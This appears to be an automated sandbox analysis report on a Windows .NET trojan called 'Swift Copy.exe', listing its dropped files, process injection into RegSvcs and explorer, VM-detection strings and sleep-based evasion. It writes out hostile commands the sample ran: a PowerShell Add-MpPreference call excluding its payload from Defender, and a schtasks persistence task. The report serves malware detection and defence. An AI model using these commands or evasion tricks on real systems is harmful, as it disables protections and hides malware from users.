          Source: Swift Copy.exe, 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
          Source: Swift Copy.exe, 00000000.00000000.237305228.000000000011A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
          Source: Swift Copy.exe | Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
          Source: Swift Copy.exe | Virustotal: Detection: 21%
          Source: Swift Copy.exe | ReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\Swift Copy.exe | File read: C:\Users\user\Desktop\Swift Copy.exe
          Source: Swift Copy.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Swift Copy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
          Source: C:\Users\user\Desktop\Swift Copy.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift Copy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift Copy.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Users\user\Desktop\Swift Copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Swift Copy.exe | File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Users\user\Desktop\Swift Copy.exe | File created: C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/9@6/5
          Source: C:\Users\user\Desktop\Swift Copy.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: Swift Copy.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Swift Copy.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
          Source: C:\Users\user\Desktop\Swift Copy.exe | Mutant created: \Sessions\1\BaseNamedObjects\qLSjiKzPfybrIOdxeHK
          Source: Swift Copy.exe, u000fu2004.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Swift Copy.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Swift Copy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Swift Copy.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: Swift Copy.exe, u000fu2004.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Swift Copy.exe | Code function: 0_2_0233E250 pushad ; ret
          Source: C:\Users\user\Desktop\Swift Copy.exe | Code function: 0_2_049C2057 push ebx; retf
          Source: C:\Users\user\Desktop\Swift Copy.exe | Code function: 0_2_049C7732 push 2400005Eh; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0191D0D1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041F358 push dword ptr [4E772C75h]; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.431867015823937
          Source: C:\Users\user\Desktop\Swift Copy.exe | File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Swift Copy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Users\user\Desktop\Swift Copy.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match File source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1816 Thread sleep time: -45877s >= -30000s
          Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1748 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc
          Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9125
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 4.6 %
          Source: C:\Users\user\Desktop\Swift Copy.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 45877
          Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.380692577.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.334568953.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 0000000B.00000000.300110801.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.327235591.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc
          Source: C:\Users\user\Desktop\Swift Copy.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01982073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01995BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01954257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
